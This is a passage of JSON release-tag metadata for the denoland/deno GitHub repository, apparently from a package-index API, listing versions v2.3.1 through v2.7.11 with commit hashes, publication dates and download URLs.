"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1"